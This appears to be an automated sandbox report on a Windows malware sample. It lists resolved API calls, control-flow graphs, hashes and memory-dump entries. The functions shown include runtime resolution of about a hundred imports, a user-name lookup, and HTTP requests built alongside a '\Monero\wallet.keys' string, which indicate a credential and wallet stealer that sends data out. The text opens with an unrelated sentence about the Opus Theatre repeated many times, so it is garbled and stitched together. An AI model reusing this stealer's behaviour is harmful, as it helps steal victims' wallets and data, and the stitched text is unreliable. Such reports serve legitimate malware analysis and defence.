and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: e8297b0fdb1e1be9dbb65f005cee2f66a698275bfe51c859b588e4d9419d9fe1
                          • Instruction ID: 59f271fcaa40b288cfa0509b103bbb4aa15dd14c8d7db079c385bb17736d5413
                          • Opcode Fuzzy Hash: e8297b0fdb1e1be9dbb65f005cee2f66a698275bfe51c859b588e4d9419d9fe1
                          • Instruction Fuzzy Hash: 6641E5607C76047EE627BFAC98EAEDD77D6DF8B748F505046E810962C0CFB065A04636
                          Function 00384880 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 384880-384942 call 39a7a0 call 3847b0 call 39a740 * 5 InternetOpenA StrCmpCA 816 38494b-38494f 801->816 817 384944 801->817 818 384ecb-384ef3 InternetCloseHandle call 39aad0 call 389ac0 816->818 819 384955-384acd call 398b60 call 39a920 call 39a8a0 call 39a800 * 2 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a920 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a920 call 39a8a0 call 39a800 * 2 InternetConnectA 816->819 817->816 829 384f32-384fa2 call 398990 * 2 call 39a7a0 call 39a800 * 8 818->829 830 384ef5-384f2d call 39a820 call 39a9b0 call 39a8a0 call 39a800 818->830 819->818 905 384ad3-384ad7 819->905 830->829 906 384ad9-384ae3 905->906 907 384ae5 905->907 908 384aef-384b22 HttpOpenRequestA 906->908 907->908 909 384b28-384e28 call 39a9b0 call 39a8a0 call 39a800 call 39a920 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a920 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a920 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a9b0 call 39a8a0 call 39a800 call 39a920 call 39a8a0 call 39a800 call 39a740 call 39a920 * 2 call 39a8a0 call 39a800 * 2 call 39aad0 lstrlen call 39aad0 * 2 lstrlen call 39aad0 HttpSendRequestA 908->909 910 384ebe-384ec5 InternetCloseHandle 908->910 1021 384e32-384e5c InternetReadFile 909->1021 910->818 1022 384e5e-384e65 1021->1022 1023 384e67-384eb9 InternetCloseHandle call 39a800 1021->1023 1022->1023 1024 384e69-384ea7 call 39a9b0 call 39a8a0 call 39a800 1022->1024 1023->910 1024->1021
                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                            • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00384915
                          • StrCmpCA.SHLWAPI(?,00E3EA88), ref: 0038493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00384ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003A0DDB,00000000,?,?,00000000,?,",00000000,?,00E3EAA8), ref: 00384DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00384E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00384E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00384E49
                          • InternetCloseHandle.WININET(00000000), ref: 00384EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00384EC5
                          • HttpOpenRequestA.WININET(00000000,00E3EA58,?,00E3DFD8,00000000,00000000,00400100,00000000), ref: 00384B15
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • InternetCloseHandle.WININET(00000000), ref: 00384ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------$X
                          • API String ID: 460715078-4062443838
                          • Opcode ID: 86e524fae4193bfd1a1d69553fffe1b0d02171da41b9bce476d7ff24003413bf
                          • Instruction ID: eb82dbc147df63bf3853bbf4796108b4aa75eb66df94355a39ca6133160286d9
                          • Opcode Fuzzy Hash: 86e524fae4193bfd1a1d69553fffe1b0d02171da41b9bce476d7ff24003413bf
                          • Instruction Fuzzy Hash: 8712D0729206189ADF16EB90DC92FEEB778BF55300F504299F10666091EF702F49DFA2
                          Function 00397850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003811B7), ref: 00397880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00397887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0039789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 4bade1e5e5f9f6933ca1c3133ced58e060376b16a59062a1d8d7b00e3592d636
                          • Instruction ID: 6e16944608dc63ea6d3a9f65c249c60cada6f8bcf7c3beec70a1a06307d3152a
                          • Opcode Fuzzy Hash: 4bade1e5e5f9f6933ca1c3133ced58e060376b16a59062a1d8d7b00e3592d636
                          • Instruction Fuzzy Hash: 27F04FB1944609AFDB00DF99DD4AFAEBFB8FB04715F10025AFA05A2680C77815048BA1
                          Function 00381160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 8546a621678b8cc3be2ca66fc32eca390fbcbbb81d85b752b3c34a285384ba46
                          • Instruction ID: ddcf895beb346e7908b5dd2dd2d339100d6328637f3f925fcba0c875c603a022
                          • Opcode Fuzzy Hash: 8546a621678b8cc3be2ca66fc32eca390fbcbbb81d85b752b3c34a285384ba46
                          • Instruction Fuzzy Hash: B2D05E7490030CDFCB00EFE0DC8DADDBBB8FB08315F000594D90562340EA305486CBA6
                          Function 00399C10 Relevance: 228.2, APIs: 112, Strings: 18, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 399c10-399c1a 634 399c20-39a031 GetProcAddress * 43 633->634 635 39a036-39a0ca LoadLibraryA * 8 633->635 634->635 636 39a0cc-39a141 GetProcAddress * 5 635->636 637 39a146-39a14d 635->637 636->637 638 39a153-39a211 GetProcAddress * 8 637->638 639 39a216-39a21d 637->639 638->639 640 39a298-39a29f 639->640 641 39a21f-39a293 GetProcAddress * 5 639->641 642 39a2a5-39a332 GetProcAddress * 6 640->642 643 39a337-39a33e 640->643 641->640 642->643 644 39a41f-39a426 643->644 645 39a344-39a41a GetProcAddress * 9 643->645 646 39a428-39a49d GetProcAddress * 5 644->646 647 39a4a2-39a4a9 644->647 645->644 646->647 648 39a4ab-39a4d7 GetProcAddress * 2 647->648 649 39a4dc-39a4e3 647->649 648->649 650 39a515-39a51c 649->650 651 39a4e5-39a510 GetProcAddress * 2 649->651 652 39a612-39a619 650->652 653 39a522-39a60d GetProcAddress * 10 650->653 651->650 654 39a61b-39a678 GetProcAddress * 4 652->654 655 39a67d-39a684 652->655 653->652 654->655 656 39a69e-39a6a5 655->656 657 39a686-39a699 GetProcAddress 655->657 658 39a708-39a709 656->658 659 39a6a7-39a703 GetProcAddress * 4 656->659 657->656 659->658
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,00E25770), ref: 00399C2D
                          • GetProcAddress.KERNEL32(74DD0000,00E25790), ref: 00399C45
                          • GetProcAddress.KERNEL32(74DD0000,00E396A0), ref: 00399C5E
                          • GetProcAddress.KERNEL32(74DD0000,00E396B8), ref: 00399C76
                          • GetProcAddress.KERNEL32(74DD0000,00E39610), ref: 00399C8E
                          • GetProcAddress.KERNEL32(74DD0000,00E39628), ref: 00399CA7
                          • GetProcAddress.KERNEL32(74DD0000,00E2BA68), ref: 00399CBF
                          • GetProcAddress.KERNEL32(74DD0000,00E3D3E0), ref: 00399CD7
                          • GetProcAddress.KERNEL32(74DD0000,00E3D200), ref: 00399CF0
                          • GetProcAddress.KERNEL32(74DD0000,00E3D218), ref: 00399D08
                          • GetProcAddress.KERNEL32(74DD0000,00E3D2D8), ref: 00399D20
                          • GetProcAddress.KERNEL32(74DD0000,00E257D0), ref: 00399D39
                          • GetProcAddress.KERNEL32(74DD0000,00E25970), ref: 00399D51
                          • GetProcAddress.KERNEL32(74DD0000,00E257F0), ref: 00399D69
                          • GetProcAddress.KERNEL32(74DD0000,00E25870), ref: 00399D82
                          • GetProcAddress.KERNEL32(74DD0000,00E3D278), ref: 00399D9A
                          • GetProcAddress.KERNEL32(74DD0000,00E3D248), ref: 00399DB2
                          • GetProcAddress.KERNEL32(74DD0000,00E2B950), ref: 00399DCB
                          • GetProcAddress.KERNEL32(74DD0000,00E25A90), ref: 00399DE3
                          • GetProcAddress.KERNEL32(74DD0000,00E3D2F0), ref: 00399DFB
                          • GetProcAddress.KERNEL32(74DD0000,00E3D260), ref: 00399E14
                          • GetProcAddress.KERNEL32(74DD0000,00E3D110), ref: 00399E2C
                          • GetProcAddress.KERNEL32(74DD0000,00E3D320), ref: 00399E44
                          • GetProcAddress.KERNEL32(74DD0000,00E25930), ref: 00399E5D
                          • GetProcAddress.KERNEL32(74DD0000,00E3D0F8), ref: 00399E75
                          • GetProcAddress.KERNEL32(74DD0000,00E3D3B0), ref: 00399E8D
                          • GetProcAddress.KERNEL32(74DD0000,00E3D230), ref: 00399EA6
                          • GetProcAddress.KERNEL32(74DD0000,00E3D1E8), ref: 00399EBE
                          • GetProcAddress.KERNEL32(74DD0000,00E3D380), ref: 00399ED6
                          • GetProcAddress.KERNEL32(74DD0000,00E3D290), ref: 00399EEF
                          • GetProcAddress.KERNEL32(74DD0000,00E3D368), ref: 00399F07
                          • GetProcAddress.KERNEL32(74DD0000,00E3D2A8), ref: 00399F1F
                          • GetProcAddress.KERNEL32(74DD0000,00E3D2C0), ref: 00399F38
                          • GetProcAddress.KERNEL32(74DD0000,00E3A3C0), ref: 00399F50
                          • GetProcAddress.KERNEL32(74DD0000,00E3D128), ref: 00399F68
                          • GetProcAddress.KERNEL32(74DD0000,00E3D140), ref: 00399F81
                          • GetProcAddress.KERNEL32(74DD0000,00E259F0), ref: 00399F99
                          • GetProcAddress.KERNEL32(74DD0000,00E3D158), ref: 00399FB1
                          • GetProcAddress.KERNEL32(74DD0000,00E25A10), ref: 00399FCA
                          • GetProcAddress.KERNEL32(74DD0000,00E3D170), ref: 00399FE2
                          • GetProcAddress.KERNEL32(74DD0000,00E3D1B8), ref: 00399FFA
                          • GetProcAddress.KERNEL32(74DD0000,00E25A30), ref: 0039A013
                          • GetProcAddress.KERNEL32(74DD0000,00E25B10), ref: 0039A02B
                          • LoadLibraryA.KERNEL32(00E3D308,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A03D
                          • LoadLibraryA.KERNEL32(00E3D338,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A04E
                          • LoadLibraryA.KERNEL32(00E3D3C8,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A060
                          • LoadLibraryA.KERNEL32(00E3D188,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A072
                          • LoadLibraryA.KERNEL32(00E3D1A0,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A083
                          • LoadLibraryA.KERNEL32(00E3D350,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A095
                          • LoadLibraryA.KERNEL32(00E3D1D0,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A0A7
                          • LoadLibraryA.KERNEL32(00E3D398,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A0B8
                          • GetProcAddress.KERNEL32(75290000,00E25C50), ref: 0039A0DA
                          • GetProcAddress.KERNEL32(75290000,00E3D470), ref: 0039A0F2
                          • GetProcAddress.KERNEL32(75290000,00E38F18), ref: 0039A10A
                          • GetProcAddress.KERNEL32(75290000,00E3D4D0), ref: 0039A123
                          • GetProcAddress.KERNEL32(75290000,00E25AD0), ref: 0039A13B
                          • GetProcAddress.KERNEL32(6FD40000,00E2BA18), ref: 0039A160
                          • GetProcAddress.KERNEL32(6FD40000,00E25AF0), ref: 0039A179
                          • GetProcAddress.KERNEL32(6FD40000,00E2B860), ref: 0039A191
                          • GetProcAddress.KERNEL32(6FD40000,00E3D530), ref: 0039A1A9
                          • GetProcAddress.KERNEL32(6FD40000,00E3D488), ref: 0039A1C2
                          • GetProcAddress.KERNEL32(6FD40000,00E25AB0), ref: 0039A1DA
                          • GetProcAddress.KERNEL32(6FD40000,00E25B70), ref: 0039A1F2
                          • GetProcAddress.KERNEL32(6FD40000,00E3D518), ref: 0039A20B
                          • GetProcAddress.KERNEL32(752C0000,00E25E30), ref: 0039A22C
                          • GetProcAddress.KERNEL32(752C0000,00E25C70), ref: 0039A244
                          • GetProcAddress.KERNEL32(752C0000,00E3D548), ref: 0039A25D
                          • GetProcAddress.KERNEL32(752C0000,00E3D560), ref: 0039A275
                          • GetProcAddress.KERNEL32(752C0000,00E25D70), ref: 0039A28D
                          • GetProcAddress.KERNEL32(74EC0000,00E2B9A0), ref: 0039A2B3
                          • GetProcAddress.KERNEL32(74EC0000,00E2B9C8), ref: 0039A2CB
                          • GetProcAddress.KERNEL32(74EC0000,00E3D578), ref: 0039A2E3
                          • GetProcAddress.KERNEL32(74EC0000,00E25E10), ref: 0039A2FC
                          • GetProcAddress.KERNEL32(74EC0000,00E25D30), ref: 0039A314
                          • GetProcAddress.KERNEL32(74EC0000,00E2B6A8), ref: 0039A32C
                          • GetProcAddress.KERNEL32(75BD0000,00E3D4B8), ref: 0039A352
                          • GetProcAddress.KERNEL32(75BD0000,00E25DD0), ref: 0039A36A
                          • GetProcAddress.KERNEL32(75BD0000,00E38F88), ref: 0039A382
                          • GetProcAddress.KERNEL32(75BD0000,00E3D410), ref: 0039A39B
                          • GetProcAddress.KERNEL32(75BD0000,00E3D428), ref: 0039A3B3
                          • GetProcAddress.KERNEL32(75BD0000,00E25D50), ref: 0039A3CB
                          • GetProcAddress.KERNEL32(75BD0000,00E25D90), ref: 0039A3E4
                          • GetProcAddress.KERNEL32(75BD0000,00E3D4E8), ref: 0039A3FC
                          • GetProcAddress.KERNEL32(75BD0000,00E3D590), ref: 0039A414
                          • GetProcAddress.KERNEL32(75A70000,00E25BD0), ref: 0039A436
                          • GetProcAddress.KERNEL32(75A70000,00E3D458), ref: 0039A44E
                          • GetProcAddress.KERNEL32(75A70000,00E3D440), ref: 0039A466
                          • GetProcAddress.KERNEL32(75A70000,00E3D5A8), ref: 0039A47F
                          • GetProcAddress.KERNEL32(75A70000,00E3D3F8), ref: 0039A497
                          • GetProcAddress.KERNEL32(75450000,00E25B90), ref: 0039A4B8
                          • GetProcAddress.KERNEL32(75450000,00E25DB0), ref: 0039A4D1
                          • GetProcAddress.KERNEL32(75DA0000,00E25C10), ref: 0039A4F2
                          • GetProcAddress.KERNEL32(75DA0000,00E3D500), ref: 0039A50A
                          • GetProcAddress.KERNEL32(6F040000,00E25B50), ref: 0039A530
                          • GetProcAddress.KERNEL32(6F040000,00E25E50), ref: 0039A548
                          • GetProcAddress.KERNEL32(6F040000,00E25C30), ref: 0039A560
                          • GetProcAddress.KERNEL32(6F040000,00E3D4A0), ref: 0039A579
                          • GetProcAddress.KERNEL32(6F040000,00E25DF0), ref: 0039A591
                          • GetProcAddress.KERNEL32(6F040000,00E25BF0), ref: 0039A5A9
                          • GetProcAddress.KERNEL32(6F040000,00E25B30), ref: 0039A5C2
                          • GetProcAddress.KERNEL32(6F040000,00E25BB0), ref: 0039A5DA
                          • GetProcAddress.KERNEL32(6F040000,InternetSetOptionA), ref: 0039A5F1
                          • GetProcAddress.KERNEL32(6F040000,HttpQueryInfoA), ref: 0039A607
                          • GetProcAddress.KERNEL32(75AF0000,00E3CF00), ref: 0039A629
                          • GetProcAddress.KERNEL32(75AF0000,00E38F48), ref: 0039A641
                          • GetProcAddress.KERNEL32(75AF0000,00E3CF60), ref: 0039A659
                          • GetProcAddress.KERNEL32(75AF0000,00E3CF48), ref: 0039A672
                          • GetProcAddress.KERNEL32(75D90000,00E25C90), ref: 0039A693
                          • GetProcAddress.KERNEL32(6F7A0000,00E3D0C8), ref: 0039A6B4
                          • GetProcAddress.KERNEL32(6F7A0000,00E25CB0), ref: 0039A6CD
                          • GetProcAddress.KERNEL32(6F7A0000,00E3CE70), ref: 0039A6E5
                          • GetProcAddress.KERNEL32(6F7A0000,00E3D008), ref: 0039A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: 0Y$0Z$0[$0\$0]$0^$HttpQueryInfoA$InternetSetOptionA$P[$P\$P]$P^$pW$pX$pY$p[$p\$p]
                          • API String ID: 2238633743-1295162599
                          • Opcode ID: 0fbb0d7a8573fbd0b5be1b57571cb6898d4332bce4a805b3f11da1d68ecdc510
                          • Instruction ID: 701fd599167cd8c19d1371658738c6bee902014338ffe8dcf5958d3c3943077f
                          • Opcode Fuzzy Hash: 0fbb0d7a8573fbd0b5be1b57571cb6898d4332bce4a805b3f11da1d68ecdc510
                          • Instruction Fuzzy Hash: D0628DB5500A48AFC748DFA8FD88D563FF9F7AC309304851AA609C3225D739985AFF52
                          Function 00395510 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 395510-395577 call 395ad0 call 39a820 * 3 call 39a740 * 4 1049 39557c-395583 1033->1049 1050 395585-3955b6 call 39a820 call 39a7a0 call 381590 call 3951f0 1049->1050 1051 3955d7-39564c call 39a740 * 2 call 381590 call 3952c0 call 39a8a0 call 39a800 call 39aad0 StrCmpCA 1049->1051 1066 3955bb-3955d2 call 39a8a0 call 39a800 1050->1066 1077 395693-3956a9 call 39aad0 StrCmpCA 1051->1077 1081 39564e-39568e call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 1051->1081 1066->1077 1082 3957dc-395844 call 39a8a0 call 39a820 * 2 call 381670 call 39a800 * 4 call 396560 call 381550 1077->1082 1083 3956af-3956b6 1077->1083 1081->1077 1212 395ac3-395ac6 1082->1212 1085 3957da-39585f call 39aad0 StrCmpCA 1083->1085 1086 3956bc-3956c3 1083->1086 1105 395991-3959f9 call 39a8a0 call 39a820 * 2 call 381670 call 39a800 * 4 call 396560 call 381550 1085->1105 1106 395865-39586c 1085->1106 1089 39571e-395793 call 39a740 * 2 call 381590 call 3952c0 call 39a8a0 call 39a800 call 39aad0 StrCmpCA 1086->1089 1090 3956c5-395719 call 39a820 call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 1086->1090 1089->1085 1188 395795-3957d5 call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 1089->1188 1090->1085 1105->1212 1111 39598f-395a14 call 39aad0 StrCmpCA 1106->1111 1112 395872-395879 1106->1112 1141 395a28-395a91 call 39a8a0 call 39a820 * 2 call 381670 call 39a800 * 4 call 396560 call 381550 1111->1141 1142 395a16-395a21 Sleep 1111->1142 1118 39587b-3958ce call 39a820 call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 1112->1118 1119 3958d3-395948 call 39a740 * 2 call 381590 call 3952c0 call 39a8a0 call 39a800 call 39aad0 StrCmpCA 1112->1119 1118->1111 1119->1111 1217 39594a-39598a call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 1119->1217 1141->1212 1142->1049 1188->1085 1217->1111
                          APIs
